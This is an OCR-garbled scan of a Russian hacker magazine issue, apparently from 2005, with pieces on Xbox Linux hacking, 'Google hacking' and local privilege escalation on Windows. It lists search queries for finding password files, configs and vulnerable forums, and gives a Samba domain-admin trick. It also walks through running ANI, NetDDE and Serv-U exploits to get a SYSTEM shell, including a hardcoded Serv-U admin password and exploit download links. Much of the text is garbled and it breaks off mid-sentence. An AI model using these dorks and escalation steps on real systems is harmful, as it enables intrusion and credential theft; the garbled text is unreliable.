Ипсіоѵѵз.соіп Майкл Робертсон, который объяснил свою деятель- 
ность по финансированию проекта исключительно идейными 
побуждениями: по его словам, пользователь вправе сам выби- 
рать ПО для работы, а Місгозоіі навязывает свой закрытый стан- 
дарт, стремясь сделать его единственным и безальтернативным. 
Что ж, нельзя не согласиться. Впрочем, истинной причиной тако- 
го шага со стороны Робетсона, была, конечно же, дешевая ре- 
клама, ведь скандал, где звучит имя «Майкрософт», — лучшая 
реклама, какую только можно себе представить для фирмы с 
названием Ыпсіоѵѵз.сот. 

В начале 2003-го был запущен проект распределенных вычисле- 
ний, целью которого была расшифровка 2048-битного ключа 
подписи (РЗА), применяемого для определения аутентичности 
запускаемых в консоли программ. В данном проекте, открыв- 




[полезная статья об устройстве ХЬох] 





шемся на сайте іІіеоперго]есі.сот, участвовало около 25 тысяч 
компьютеров. Но вычислительные мощности такого количества 
компов не способны даже теоретически перебрать все вариан- 
ты 2048-битного ключа РЗА. Таким образом, затею можно было с 
самого начала считать обреченной, впрочем, Місгозоіі все же 
отреагировала на подобную деятельность, и проекту под ее да- 
влением пришлось закрыться, но лишь на время. Как бы то ни бы- 
ло, успеха он не принес, а ведь расшифровка ключа предоста- 
вила бы возможность запускать на коробке абсолютно любое 
ПО, в том числе и Линукс. 

[шутники-линуксоиды] В марте появилась интересная новость для 
владельцев ХЬох'ов: участники ХЬох Ппих Ргоіесі'а предложили 
Місгозоіі лицензировать Линукс в качестве приложения для ко- 
робки, предложив за это мелкомягким 100 тысяч долларов (те са- 
мые, которые являются призом за взлом приставки!!!). Конечно, 
Майкрософт на это никак не отреагировала (еще бы, это все по- 
ходило на дурацкую шутку ;). 

И вот в начале апреля появилась совсем уже невероятная но- 
вость, которую никто сначала даже не воспринял всерьез: хакер 
НаЬіЬі_хЬох в одиночку решил проблему взлома приставки без 
аппаратной модификации. Метод взлома был опубликован им на 
форуме сайта ХЬохНоскег.пеі, он был настолько прост, что вы- 
звал недоверие у большинства посетителей сайта. Но вскоре 
возможность применения данного метода подтвердили предста- 
вители ХЬох Ппих Ргоіесі'а. 

Метод НаЬіЬі_хЬох'а состоял в эксплуатации дыры в игре 007 
Адепі ІІпсІег Ріге от компании ЕІесігопіс Агіз. Эта игра делает 
сэйвы на жестком диске. Если внести некоторые изменения в 
файл сохраненной игры и загрузить его в игре, то можно вызвать 
системную ошибку, переполнение и перехватить управление 
приставкой. НаЬіЬі_хЬох копировал файл сохраненной игры на 
флеш-карточку, после чего редактировал его на ПК, совмещая 
со специальным дистрибутивом Ппих, предназначенным для ап- 
паратно модифицированных приставок. Таким образом, загруз- 
ка данного файла в игре приводила к запуску Ппих. 




[на сайте иКгасііір.ги можно купить мод-чип и почитать интересные статьи] 

А во второй половине месяца рЗуСо выложил на хетиІаТіоп.сот 
инфу о том, как с помощью вышеописанного метода можно пере- 
прошить ВІОЗ приставки. Для этого он использовал специальную 
программу Раіпсоаі, маскирующуюся под файл сохраненной 
игры, и в итоге внес в ТЗОР-консоли изменения, которые дают воз- 
можность загружать ХЬох Ппих І_іѵе напрямую, без необходимо- 
сти загрузки игры и т.п. 

Так закончилась история портирования Линукса на коробку. Ха- 
керы, как всегда, одержали победу над Місгозоіі в противостоя- 
нии, длившемся целый год © 





Зеа-Ооо 30 - первый трансформируемый водный мотоцикл. Он способен 
принимать пять положений: КАВТ, МОТО, ѴЕВТ, ЗНОО И МЕЕ. 
Каждый вариант принципиально отличается от других поведением на 
воде и способом управления. 

Настройся на волну своего настроения! 
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его статьей. 

Подробнее о синтаксисе 
файлов для роботов можно 
узнать тут: 

тм /іобоівіхі. огд/ж/пого- 
ЬоізМтІ. 



Ѳоодіе-Иаск для 
маленьких 

ПОИСКОВЫЕ СИСТЕМЫ СЛУЖАТ ДЛЯ ОБЛЕГ- 
ЧЕНИЯ ЖИЗНИ ЧЕЛОВЕКА. В ЛЮБОЕ ВРЕМЯ 
С ПОМОЩЬЮ ЕДИНСТВЕННОГО ЗАПРОСА ТЫ 
МОЖЕШЬ НАЙТИ ЛЮБУЮ ИНТЕРЕСУЮЩУЮ 
ИНФОРМАЦИЮ. ОДИН ИЗ ИЗВЕСТНЕЙШИХ 
ПОИСКОВЫХ САЙТОВ НАЗЫВАЕТСЯ ООО- 
ОЬЕ.СОМ. ЭТО САМЫЙ НАВОРОЧЕННЫЙ РЕ- 
СУРС С МНОГОЧИСЛЕННЫМИ И УДОБНЫМИ 
НАСТРОЙКАМИ. С ПОМОЩЬЮ ООООБЕ МОЖ- 
НО СОВЕРШИТЬ МНОЖЕСТВО СЕТЕВЫХ 
АТАК И НАЙТИ КОНФИДЕНЦИАЛЬНУЮ ИН- 
ФОРМАЦИЮ — ДОСТАТОЧНО ЛИШЬ УМЕТЬ 
ГРАМОТНО СФОРМИРОВАТЬ НУЖНЫЙ ЗА- 
ПРОС I Докучаев Дмитрий ака РогЬ (КэгЬ@геаІ. хакер. ш) 

Хакерское применение 
поисковых машин 

То, что Ооодіе пользуется популярностью среди хаке- 
ров, думаю, доказывать не стоит. Недаром взломщики 
выделили Соодіе-Гюск в отдельное хакерское тече- 
ние. Оно заключается в том, что злоумышленник ищет 
жертву через страницы поисковика, вбивая в окно для 
запроса специальные строки, помогающие обнару- 
жить уязвимость в софте. Нередко с помощью доо- 
діе.сот хакеры находят секретные документы, кото- 
рые случайно оказались на всеобщем обозрении. 
Большинство запросов включают в себя специальные 
средства поиска Ооодіе, с которыми я тебя обяза- 
тельно познакомлю. 

[что может Ооодіе?] Зайди на ѵѵѵѵѵѵ.доодіе.сот и об- 
ратись к вкладке «Расширенный поиск». На этой стра- 
нице указываются параметры запроса, которые мо- 
гут пригодиться хакеру. Так, например, чтобы найти 
все страницы, содержащие в заголовке текст «Хакер- 
ский сайт Васи Пупкина», достаточно изменить опцию 
«Упоминание», поставив значение «В заголовке стра- 
ницы», а затем набрать нужный текст строкой ниже. 
Зачем это нужно? Дело в том, что некоторые секрет- 
ные страницы по недосмотру администраторов могут 




не защищаться паролем, а умный поисковик без труда запомнит 
местонахождение таких ссылок. А по ключевым словам ты без 
проблем сможешь отыскать «золотые страницы интернета» :). 
Чтобы не быть голословным, попробую показать тебе всю мощь 
поисковика. Три месяца назад мир узнал об уязвимости в форуме 
рГірВВ 2.0.10, и ты тоже наверняка об этом слышал. Но вот беда: 
не все админы успели обновить форум до более стабильного ре- 
лиза. Гугл хранит в себе массу ссылок на ресурсы со старой 
версией борды. От хакера требуется лишь найти жертву с помо- 
щью одного-единственного запроса «Ро\л/егесІ Ьу рГірВВ 2.0.10». 
Теперь, если в установках указать, что нужно выводить не десять 
результатов на страницу, как это делается по дефолту, а сразу 
сто, искать бажные ресурсы станет заметно проще. Когда прос- 
мотришь все ссылки, можешь попросить Гугла найти сервер с фо- 
румом 2.0.9 и т.д. В общем, тут есть где разгуляться! 

[конфиги и пароли] Поисковик Ооодіе — это не обычный ресурс. 
Если, скажем, уязвимые форумы хакер может найти на Яндексе 
или Рэмблере, то на этих поисковиках взломщику сложно будет 
отыскать файлы с определенным расширением. Представь, что 
одним прекрасным днем злоумышленник захотел найти себе 
красивый ІСО-уин. Недолго думая, он зашел на Ооодіе, ввел в 
поисковую строку фразу «Іпсіех.о^ ІСО сІаТ» и, щелкнув по третьей 
ссылке, стал законным обладателем крутого номерка. А все по- 
тому, что какой-то ламер открыл на весь мир каталог с бэкапом 
своего диска С. 

Давай разберемся, как же так получилось. Видно, что в запросе 
присутствуют какие-то странные слова. Все это — специфичные 
для поисковой системы выражения. Как ты, наверное, замечал, 
\л/еЬ-сервер АрасГіе при выводе листинга какого-либо каталога 
пишет в самом верху жирную надпись «Іпсіех о^ /каталог». Суще- 



ствует немаленькая вероятность, что какой-нибудь лабух вывесил 
в инете содержимое своего сЛргодгот ПІезМСО. Поэтому в за- 
просе используются слова «ІСѲ» и «сІаТ», чтобы отсеять ненужное. 
А точка в нашем случае выступает в роли символа пробела — это 
общепринятое обозначение в Ѳоодіе. 

Но напороться на красивый шестизнак с помощью Ѳоодіе-Гюск 
не так-то просто. Обычно злоумышленники ищут не симпатичные 
аськи, а какие-нибудь конфиги. К примеру, тебе захотелось про- 
верить наличие ссылки на небезызвестный \л/сх_іір.іпі. Этот кон- 
фиг от ТоіаІ Соттапбег сохраняет в себе пароли на различные 
РТР-архивы. И надо сказать, что расшифровать эти пассворды не 
составляет особого труда. Узнать все ссылки на ѵѵсх_іір.іпі помо- 
жет запрос вида «ИІеіуре:іпі іпигІ:\л/сх». Пришло время разобрать- 
ся в премудростях этих выражений. 

Конструкция іііеіуре позволя- 
ет указывать искомое расши- 
рение файла. Она имеется в 
арсенале многих поискови- 
ков, однако только Ѳоодіе по- 
зволяет задавать любое рас- 
ширение для поиска. Второе 
выражение /лиг/ проверяет на- 
личие подстроки в целой ссы- 
лке. То есть логическое обос- 
нование поискового запроса 
можно сформулировать как «Я 
хочу увидеть все ссылки, окан- 
чивающиеся на .іпі и имею- 
щие подстроку \л/сх». Таким 
образом хакер находит нуж- 
ные ему конфиги. Никто не ме- 
шает злоумышленнику поис- 
кать конфиг с зашифрованным 
паролем от Ебіаіег'а, ключи 
ѴѴеЫѴІопеу и т.д. 

[поиск уязвимостей] Наконец, мы подошли к самым распро- 
страненным запросам, которые задаются хакерами. Это руч- 
ной поиск уязвимостей в Ѳоодіе-ссылках. Представим ситуа- 
цию: некий взломщик нашел баг в голосовалке ѵоіе.ріір. Суть 
дыры в том, что скрипту передается параметр апзѵѵег, изменив 
который, можно подключить к сценарию любой текстовый 
файл. Но вот беда: хакер не может найти применение свежей 
дырке. Писать телегу в багтрак неохота, так как есть желание 
взломать ряд серверов с активной голосовалкой. Приходится 
идти на Ѳоодіе и искать заразные ссылки там. По всей видимо- 
сти, злоумышленник воспользуется запросом «ЯІеТуре:рГір 
Іпиг1:ап5\л/ег». Большинство этих ссылок покажет серверы, на ко- 
торых установлен искомый скрипт. 

Но все это только в теории. На практике ситуация может быть не 
очень красивой. Представь, что помимо бажной голосовалки су- 
ществует еще один скрипт ѵоіе.ріір, который более распростра- 
нен, нежели предыдущий. И что же, прикажешь бедному хакеру 
перерывать тысячи запросов Ѳоодіе и искать нужный? Вовсе нет :). 
Достаточно отфильтровать левые ссылки с помощью добавочной 
подстроки. Скажем, если ненужному скрипту передается еще 
один параметр сІіепі=номер, достаточно дописать в окно с за- 
просом ключевое слово «-сІіепТ», и взломщик уже не увидит тех 
ссылок, которые ранее надоедали хакерскому глазу :). В такой 
ситуации важно найти коренное отличие, которое затем задает- 
ся в виде исключающего слова. Кстати, таких слов может быть 
несколько, что еще раз доказывает мощность поисковика. 
Многие хакеры и простые скрипткидисы часто бродят по Гуглу в 
поиске очередной жертвы. По некоторым признакам они сами 
тестируют скрипты на общеизвестные баги и тем самым проводят 
атаку. Я не буду перечислять список ошибок, а лишь приведу 
простой пример. Ты знаешь, что большинство сді-скриптов, под- 
ключающих ГхГ-файлы, делают это через функцию ореп(). Таким 
образом, в некоторых сценариях хакер может легко подключить 
файл /еіс/раззѵѵсі либо вообще вывод /изг/Ып/іс! (все зависит от 
его фантазии :)). Как ты думаешь, каким способом взломщик на- 
ходит подобный баг? Я тебе отвечу не задумываясь — через доо- 
діе.сот. Недоброжелатель просто вводит в поисковое окно за- 
прос «ЯІеГуреюді іпигГГхГ», и, если нужно, еще несколько призна- 
ков. В ответ поисковик возвращает тысячи ссылок с сотнями уязви- 
мых скриптов. А ведь я привел пример лишь с сді и ГхГ. Если учиты- 



Админы Ѳоодіе закрыли 
некоторые запросы, 
которые юзают известные 
черви. Например 
поисковый запрос 
«іпигйріір іпигІ:ісІ» 
вызывает глобальную 
ошибку системы :). 

Не стоит забывать, что все 
действия хакера 
противозаконны и эта 
/ | \ статья предназначена лишь 
для ознакомления и 
организации правильной 
защиты с твоей стороны. За 
применение материала в 
незаконных целях автор и 
редакция ответственности 
не несут. 
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[где-то тут тебя ждет красивый номерок] 

вать бажный инклуд ГіГтІ-файлов, а также то, что скрипты могут 
иметь расширения рі, рГір и азр, то число найденных ссылок бу- 
дет стремиться к бесконечности. Не забывай, что база Ѳоодіе 
регулярно обновляется, и не исключено, что набор линков, пока- 
занных сегодня, будет отличаться от завтрашних ссылок. 

Нередко хакеры выбирают для взлома серверы в определенной 
зоне. Скажем, захотелось спамеру Пете найти французский 
прокси-сервер. Но вот беда, на всех публичных источниках он не 
обнаружил анонимного проксика. Пришлось просить помощи у 
доодіе.сот. Петр зашел на Гугл и ввел в окно запроса «ро\л/е- 
гесІ.Ьу.рГірВВ 5ІГе:1т». Поисковик выдал пару сотен ссылок на 
французские ресурсы со старой версией форума, и уже через 
полчаса негодяй Петя активно спамил интернет через безопас- 
ный прокси-сервер. И все благодаря силе Ѳоодіе. 

Часто бывает, что хакеры выкладывают в риЫіс-источник эксплой- 
ты для определенной версии \А/еЬ-сервера. А те, кто решился его 
заюзать, лезут на Ѳоодіе и ищут уязвимые релизы через ответы по- 
исковика. Как они это делают? Очень просто! Злоумышленники 
пользуются директивой іпііііе, которая указывает на информацию, 
расположенную в заголовке страницы. К примеру, чтобы найти 
все серверы под управлением АрасГіе 2.0.48, необходимо сфор- 
мировать условие іпіііІе:іпсІех.оі Аросііе/2.0.48. 

И еще один твик, которым пользуются хакеры. Можно использо- 
вать поисковик для обнаружения определенного скрипта, кото- 
рый установлен в фиксированном каталоге. Например, взломщик 
хочет отыскать скрипт аукциона таіп.рГір и точно знает, что сце- 
нарий находится в папке /туаисііоп. Запрос будет выглядеть 
следующим образом: «аІІіпигІ:/туаисГіоп/таіп.рГір». 

[средства автоматизации] Не так давно несколько добрых людей 
написали замечательную утилиту, которая автоматизирует про- 
цесс поиска. Точнее, делает его удобнее. Теперь любой желаю- 
щий может искать нужные ссылки прямо в консоли. Достаточно 
скомпилировать сишный файл іі іір ://раске ізіогтзесигііу. л //(ѴМХ/ 
аисііі/ідооі. с и запустить бинарник с параметром поискового за- 
проса. Радует, что эта утилита поддерживает прокси и легко пор- 
тируется под многие системы. 

Я думаю, ты убедился, что Ѳоодіе-Гіаск можно выделить в отдель- 
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[отказываемся от индексирования ресурса] 




[ручной поиск уязвимостей] 




ное течение. Уж очень много людей пользуется поисковиком в ко- 
рыстных целях. Существует целый ресурс Шр://іоІіппу.іІіаск- 
8 ТиЯ.сот, который содержит множество поисковых запросов для 
нахождения уязвимых страниц. Обязательно посети этот сайт и, 
быть может, откроешь для себя много нового. 

Кстати, чтобы автоматизировать свои действия, необходимо 
заключить специальное соглашение с Гуглом. Внимательно 
почитай текст ѵѵѵѵѵѵ.доодІе.сот/ТегтЗ-ОІ-Зегѵісе.ІіІтпІ и все 
поймешь сам. 

[защити свой ресурс!] Владеть информацией о взломе с помо- 
щью Соодіе — это, конечно, здорово. Но нужно научиться защи- 
щаться от хакеров, которых хлебом не корми — дай что-нибудь 
поломать. А для защиты требуется знать три простых правила. 

Ш Запрещение индексирования сайта. 

Никакой поисковый ресурс не будет индексировать сайт без 
разрешения владельца. Но бывает всякое: то какой-то недобро- 
желатель вывесит на своем сайте линк на сторонний ресурс, то 
подпишет его в доодіе.сот. Если ты наотрез отказываешься от ин- 
дексирования, просто создай в корне своего сайта файл го- 
ЬоТз.ТхТ. В нем напиши две строки: 

ІІзег-адепі: * 

ОізаІІоѵѵ: / 

Теперь Ѳоодіе и все остальные поисковики перестанут зано- 
сить в базу страницы с твоего сайта. Все подобные системы 
обладают искусственным этикетом. Они ищут, перечитывают 
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[как много интересных конфигов!] 




файл гоЬоГз.ГхГ и подчиняются его содержимому. В моем приме- 
ре описывается запрещение индексации всего ресурса для 
всех ІІзег-АдепГов. 

Ш Отказ от индексирования ресурса. 

Можно пойти другим путем для отказа от индексирования стра- 
ниц сайта. Зайди на страницу ѵѵѵѵѵѵ.доодіе.сот/гетоѵе.іііппі и 
оформи заявку на отказ от использования поисковика. Правда, от 
тебя потребуется доказать, что ты являешься хозяином сайта. Для 
этого нужно вставить на определенную страницу некоторые тэги. 
Только тогда Ѳоодіе перестанет индексировать твой ресурс. 

0 Самое простое правило. 

Чтобы не стать добычей для хакеров, возьми себе за правило: не 
храни на сервере важной информации, даже если тебе кажется, 
что она достаточно хорошо защищена. Используя Ѳоодіе, хакер 
легко обнаружит нужный документ, который вполне может оказа- 
ться конфиденциальным. Помимо этого, старайся не использо- 
вать публичных и незащищенных скриптов — они могут подвести 
тебя в самый неподходящий момент © 



[ЛАКОМЫЕ ЗАПРОСЫ] 

Приведу несколько запросов, с помощью которых 
хакер без труда добывает нужную информацию. 
Естественно, что только Ѳоодіе помогает ему в этом 
нелегком деле. 

Іпсіех.оі тазіег.раззѵѵсі — поиск паролей во РгееВЗО 
Іпсіех.оі /асіпліп — почувствуй себя админом! 

Іпсіех.оі ѵѵз_ГСр.іпі — а теперь найдем конфиг для ѴѴЗ_РТР0 
Іпсіех.оі "аплоипі.хіз" — или важную банковскую базу 
ііІеіуре:здІ іпигГизегз — кстати, о базах... 
іпШІе:ІІзаде Зіаіізіісз іог ОепегаіесІ Ьу ѴѴеЬаІігег — 
смотрим статистику 

іпШІе:ІпсІех оі сІЬсопѵегі.ехе сііаіз — а также логи ІСО-чата 
зііелр ііІеіуре:рІ іпигкіхі — это мы уже проходили. ЗресіаІ іог Зарап :) 
ііІеіуре:рНр іпигІТіІе — поиск инклуд-файлов к РНР 
іпигІ:таіп.рИр ѴѴеІсоте іо рИрМуАсІтіп — дырявый рИрМуАсІтіп 
зііе:доѵ іпигГСопіісІепііаІ ііІеіуре:рсІі — под грифом 
«Совершенно секретно» :) 

іпигІ:питЬег ііІеіуре:азр — ищем 50І_-инжекцию в АЗР-скриптах 
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Модемы Отпі 56 К 

Максимальная скорость 
доступа в Интернет 
Надежная связь 
на любых линиях 
Легкая установка 
и простота в обращении 
Три пода гарантии 



При покупке модема - 
Интернет-карта 
■ подарок* 
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модемы серии 
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0МЫІ.2уХЕІ_.Пи 









ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВНІІМ НЬЮСЫ 



[ЛАЗЕЙКА ЧЕРЕЗ ЗАМВА] 

Существует один очень хороший и прове- 
ренный способ взлома ѴѴіпсІоѵѵз. Если у зло- 
умышленника имеется удаленный или ло- 
кальный доступ к графической оболочке, а 
компьютер входит в самбовый домен, у него 
есть возможность получить админские пра- 
ва на ѴѴіпсІоѵѵз. Для реализации задачи ха- 
керу нужно получить гооі-доступ на Ііпих- 
сервере, а затем добавить свой сетевой ло- 
гин в группу сіотаіп-асітіпз. Следующая за- 
пись должна быть прописана в файле /еіс/ 
затЬа/зтЬизегз (или в другом каталоге): 

гооі = асітіпізігаіог уоигіодіп 

После изменений взломщик должен 
заново зайти под именем уоигіодіп. 
Теперь его аккаунт наделен админски- 
ми правами :). 





} 




Админ в окошке 

ВЕСЬ МИР ЗНАЕТ О ТОМ, КАК ЛЕГКО 
ПОЛОМАТЬ ѴѴІШОѴѴЗ. ДОСТАТОЧНО 
СКАЧАТЬ КАКОЙ-НИБУДЬ УДАЛЕН- 
НЫЙ ЭКСПЛОЙТ С ХАКЕР.ВІІ И НАТРА- 
ВИТЬ ЕГО НА ВАЖНЫЙ СЕРВЕР. НО 
ДАЛЕКО НЕ ВСЕ СРЕДСТВА ПОЗВОЛЯ- 
ЮТ ПОЛУЧИТЬ ПРАВА АДМИНИСТРА- 
ТОРА. РАЗРУЛИТЬ ТАКОЙ НЕВЕСЕ- 
ЛЫЙ РАСКЛАД ПОМОЖЕТ РАБОЧИЙ 
ЛОКАЛЬНЫЙ ЭКСПЛОЙТ, ВЫБОРОМ 
КОТОРОГО Я СЕГОДНЯ И ЗАЙМУСЬ I 

Докучаев Дмитрий ака РогЬ (1ЪгЬ@геаІ.хакер.ги) 



Локальные атаки 
на современные версии ѴѴіпсІоѵѵз 

[подготовка к укрощению] Что же делают взломщики 
после того, как получают доступ к заветной команд- 
ной строке? В первую очередь необходимо оценить 
свои привилегии. Ведь удаленно поломать винду мож- 
но не только с помощью эксплойта. Вполне реально, 
что взломщик проник в систему через троянскую ла- 
зейку либо другим изысканным способом. В этих слу- 
чаях злоумышленник пока не знает, какими полномо- 
чиями он обладает. Узнать их поможет команда іазкЫ 
/V. После выполнения команды нужно посмотреть, 
под чьим именем запущен процесс стсі.ехе. Если это 
имя ЗУЗТЕМ, то хакеру уже не нужны дополнительные 
эксплойты — им взят верх привилегий ѴѴіпсІоѵѵз :). В слу- 
чае если логин другой, следует проверить, в какую 
группу он входит. Для этого нужно набрать уже другую 
команду: пеТ изегз Ю0//Ѵ (где Ю0//Ѵ — найденное 
имя). Предпоследняя строчка покажет членство в 
системных группах. Опять же, если в подстроке есть 
слово Асітіпізігаіогз (или «Администраторы»), то забо- 
титься о повышении прав не следует — все уже и так в 
шоколаде. В противном случае можно начинать ис- 
кать баг в системе и тестировать локальный эксплойт. 

[пробиваем систему] Настало время протестировать 
несколько очень удачных эксплойтов. Я их описывал в 



Не стоит забывать, что все 
действия хакера противозакон- 
ны и эта статья написана лишь 
для ознакомления и организа- 
ции правильной защиты с тво- 
ей стороны. За применение ма- 
териала в незаконных целях 
автор и редакция ответствен- 
ности не несут. 

После взятия административ- 
ных привилегий хакер может 
с легкостью остановить файр- 
вол командой І\ІЕТ ЗТОР 
имя_сервиса. 

На компакт-диске ты найдешь 
утилиты для локального взло- 
ма Шпбож, облегчающие 
жизнь хакера. 




своем обзоре, однако о запуске говорил лишь в общих чертах. 
Задача хакера усложняется тем, что поднятие прав необходимо 
осуществить в командной строке без графического интерфейса. 
Но это совсем даже не помеха! 

Самым свежим и удачным средством для локального нападения 
является творение под названием Іпіегпеі Ехріогег .АЫІ ГМез Иап- 
сіііпд ІІпіѵегзаІ Ехріоіі. Я не буду углубляться в детали и рассказы- 
вать, по какому принципу работает сплойт (это все уже описыва- 
лось в мартовском обзоре), а подробнее остановлюсь на запус- 
ке и использовании этого средства для взлома. 

В первую очередь необходимо скачать эксплойт и скомпилиро- 
вать его с помощью Ісс. В журнале уже не раз писалось про по- 
добные вещи. После того как у взломщика в арсенале будет рабо- 
чий бинарный файл, его следует аккуратно транспортировать на 
взломанный сервер. Сделать это можно с помощью интегрирован- 
ного троянского ЕТР-доступа (если такой имеется) либо используя 
примитивный сценарий для встроенного в ѴѴіпсІоѵѵз Іфэ-клиента. 
Затем, когда эксплойт будет успешно залит, его надо правильно 
запустить. Стартует он с двумя параметрами: ЫтпІ-файл и необ- 
ходимый_порт. Если все выполнено верно, в текущем каталоге 
создадутся два документа с расширениями апі и НітІ. Имя фай- 
ла будет совпадать с первым указанным параметром. 

Далее в инструкции по применению говорится о том, что взлом- 
щик должен запустить ІЕ и открыть созданный документ. Но как 
же, спросишь ты меня, сделать это в голой консоли? А очень 
просто :). Разумнее всего выполнить команду 8ТАНТ /М/Л/ ехріог- 





ег.ехе ЬасІ.ІіітІ, где ЬасІ.ІіітІ— созданный документ. Опция /М/Л/ 
позволит запустить эксплорер в свернутом режиме, благодаря 
которому пользователь не сразу заметит (если вообще заметит) 
постороннее окно. Впрочем, этот процесс можно успешно убить 
сразу после эксплуатирования, но начальная маскировка никог- 
да не бывает лишней. 

После этих нехитрых действий хакер подключается на ІосаІИозі к 
заданному ранее порту, где его ждет шелл с системными права- 
ми. Ошибка соединения может возникнуть лишь в том случае, ес- 
ли атакуемая система — \Л/іпХР+ЗР2 либо если система была 



пропатчена грамотным пользователем. 

Но что же делать, если первый способ не сработал? Самое глав- 
ное не бросаться в панику, а трезво оценить обстановку. Причи- 
ны неработоспособности эксплойта я изложил в предыдущем 
абзаце — скорее всего, хакер просто столкнулся с одной из них. 
Как вариант можно попробовать заюзать другой, не менее крити- 
ческий сплойт, который использует баг в службе ЫеЮОЕ. Но 
сперва необходимо посмотреть, запущен ли сервис в текущий 
момент (по дефолту эта служба отключена). Взломщик сделает 
это с помощью запроса Л/ЕТ" 8ТАЯТ. Затем он проанализирует каж- 
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[просмотр имени пользователя] 




[анализ хакерских полномочий] 



[хакер 04 [76] 05 061 ] 





[хакер 04 [76] 05 062 ] 



[НОРМАЛИЗУЕМ ДАННЫЕ] 

Для наглядности я свел все упомянутые в статьи инструменты в отдельную таблицу. Используя ее, можно быстро 
скачать нужную программу и проверить свою систему на безопасность. 


НАЗВАНИЕ 


НАЗВАНИЕ 


НАЗВАНИЕ 


НАЗВАНИЕ 


ІІМТЕВІМЕТ ЕХРШВЕВ .АІМІ РІІ_ЕЗ НАІМ- 

оыіме ілміѵевзаь ехршіт 


ЛОКАЛЬНЫЙ ВЗЛОМ 


ѴѴІІМ2К, ѴѴІІМ2003, ѴѴІІМХР+(ЗР1) 


НТТР://ѴѴѴѴѴѴ.5ЕСЫВІТУЬАВ.ВЫ/_АВТІСЬЕ_ІМАѲЕ5/2005/01 /НОЭ-М305002- 
АІМІ-ЕХРЬ.С 


ІМЕТОБЕ ВИЕРЕВ 0ѴЕВРШѴѴ ЕХРШІТ 


ЛОКАЛЬНЫЙ ВЗЛОМ 


ѴѴІІМ2К, ѴѴІІМ2003, \А/ІІМХР+(ЗР1) 


НТТР://ѴѴѴѴѴѴ.ЗЕСиВІТУЬАВ.Ви/51 725.НТМБ 


5ЕВѴ-ІІ І_0САІ_ ЕХРШІТ 


ЛОКАЛЬНЫЙ взлом 


ЗЕВѴЛ Ѵ>3.0 


НТТР://ѴѴѴѴѴѴ1 .ХАКЕР. ВЫ/Р05Т/23438/ЕХРШІТ.ТХТ 


МУЗОЬ ЕХРШІТ 


ПРОСМОТР ТАБЛИЦ МУЗОЬ 


МУЗОЬ ѵ.з.х 


НТТР://ѴѴѴѴѴѴ. ХАКЕР. В1]/Р05Т/23047/МУ50Ь_ЕХРЬ01Т.71Р 


ВМР Э03ЕВ 


ЛОКАЛЬНЫЙ й03 


1. Е. 6.0 


НТТР://ѴѴѴѴѴѴ.4ВМАН.С0М/ЕХРШІТЗ/ТІНУВМР.НТМ 


ІІМТЕВІМЕТ ЕХРШВЕВ .АІМІ РІІ_ЕЗ 
нАшиіме йоз 


ЛОКАЛЬНЫЙ й03 


ѴѴІІМ2К, ѴѴІІМ2003, \А/ІІМХР+(ЗР1) 


НТТР://ѴѴѴѴѴѴ.ХРОСЬІЗ.ІМЕТ/РЬАЗНЗКУ/ІСОЕХР/АІМІВЬЬІЕ.НТМ 


В01ЛМСЕВ 


ЗОСКЗ-СЕРВЕР 


ѴѴІІМІМТ 


НТТР://ѴѴ\Л/\Л/.ЗЕСЫВІТУЬАВ.ВЫ/Т00ЬЗ/00\Л/ЫЬ0А0/32559.НТМЬ 


ьсс 


КОМПИЛЯЦИЯ 

ЭКСПЛОЙТОВ 


ѴѴІІМІМТ 


НТТР://Ы30.ВЫ/50РТ/1/АЫ0/ЬСС\Л/ІЫ32.ЕХЕ 


N ЕТС АТ 


РАБОТА С СЕТЕВЫМИ 
ПОТОКАМИ 




ЬССНТТРѴ/ІМЕТСАТ.ЗОІЖЕРОВОЕ.ІМЕТ 



дую строку и найдет (или не найдет) сер- 
вис ѴѴіпЭЭЕ. После этого можно сливать 
эксплойт, собирать его, как это было сде- 
лано с первым экземпляром, и закачивать 
файл на сервер. При запуске бинарника 
необходимо указать аж четыре опции: ІР- 
адрес, І\ІЕТВІО$-имя, цель и порт. Первый 
параметр известен сразу — это сетевой 
адрес машины (именно тот, который све- 
тит в Сеть, а не 127.0.0.1). Второй легко на- 
ходится из результата команды Л/ЕТ Ѵ7ЕИ//Р- 
одрес (тот, который является первой опци- 
ей). Целей всего две — цифра 0 использу- 
ется для ѴѴіпХР, а единица — для \Л/іп2К. И 
наконец, последняя опция генерируется 
из диапазона 1024 - 65535 на твое усмот- 
рение :). 

И что же в итоге? Если все выполнено вер- 
но, злоумышленник получит системный 
шелл, который откроется сразу после 
эксплуатирования. По каким-то причинам 
это чудо может и не произойти — если ра- 
нее был наложен патч на этот баг либо 
ѴѴіпЭЭЕ вообще не запущен. В таком пе- 
чальном случае хакер продолжит поиск 
эксплойтов. 

[внешние сервисы под прицелом] Если не 
получилось ломать внутренние службы, 
можно попробовать захакать внешние. Я го- 
ворю про те, которые были поставлены 
пользователем компьютера. Нет, я вовсе не 
хочу сказать, что лопоухий юзер всегда ста- 
вит кривой софт. Просто часто после уста- 
новки программы человек банально задви- 
гает на все и придерживается принципа 
«работает, и ладно». Подобный софт — на- 
ходка для хакера. Давай рассмотрим на 
примере, какие внешние программы обяза- 
тельно сломаются под натиском эксплойта 
и дадут админский шелл, конечно :). 

Самый наглядный пример одновременно 
дырявого и частоюзаемого софта — прог- 
рамма ЗегѵІІ РТРЭ. Этот дистрибутив можно 
найти у любого юзера крупной локальной 
сети. Примечательность программы в том, 
что она умеет все и еще чуть-чуть. Но за 
удовольствие нужно платить, поэтому раз- 
работчики воткнули в этот дистрибутив ог- 
ромную кучу багов :). Чтобы жизнь малиной 
не казалась. 

Одна из самых замечательных ошибок, най- 
денных в ЗегѵІІ, заключается в том, что деве- 
лоперы посчитали создание администрато- 
рского аккаунта со статическим паролем 
довольно безопасным делом. И незаметно 
повесили ЕТР-порт на локальный хост. Таким 
образом, ЕТР-менеджер после запуска сое- 
диняется с 127.0.0.1:43958 и авторизуется под 
аккаунтом ЦосаІАсІтіпі5ТгаТог:#І@$ак#.Ік;0@Р. 



А что мешает хакеру прикинуться ЕТР-менед- 
жером? Правильно, ничего :). Для достиже- 
ния грязных целей злоумышленник заливает 
скомпиленный эксплойт на машину, а затем 
запускает его с одним-единственным пара- 
метром — командой, которую нужно выпол- 
нить. На самом деле, чтобы достичь выполне- 
ния команды, эксплойт создает дополнитель- 
ный домен, а затем и пользователя в этом до- 
мене. Этот юзер наделяется всеми правами, 
